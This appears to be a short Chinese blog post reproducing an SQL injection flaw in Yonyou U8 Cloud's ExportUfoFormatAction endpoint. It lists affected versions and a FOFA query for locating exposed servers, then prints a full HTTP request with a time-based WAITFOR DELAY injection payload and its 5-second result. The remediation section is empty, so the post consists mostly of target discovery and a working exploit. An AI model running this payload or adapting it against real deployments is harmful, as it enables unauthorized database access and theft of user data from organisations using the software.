Babing
Published on 2024-08-30 / 2 Visits
0
0

Y3-32用友-U8-Cloud-SQL

Y3-32用友-U8-Cloud-SQL

漏洞描述:

用友U8 Cloud ExportUfoFormatAction接口处存在SQL注入漏洞,未授权的攻击者可通过此漏洞获取数据库权限,从而盗取用户数据,造成用户信息泄露。

影响版本:

version = 1.0,2.0,2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1,3.2,3.5,3.6,3.6sp,5.0,5.0sp  

网站图片:

image-20240623104414371

网络测绘:

fofa语法:

FOFA:app=“用友-U8-Cloud”

漏洞复现:

payload:

GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.ExportUfoFormatAction&method=&repID=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

效果图:
延时5秒

Sqlmap验证

Yaml模板

修复建议:

参考链接:


Comment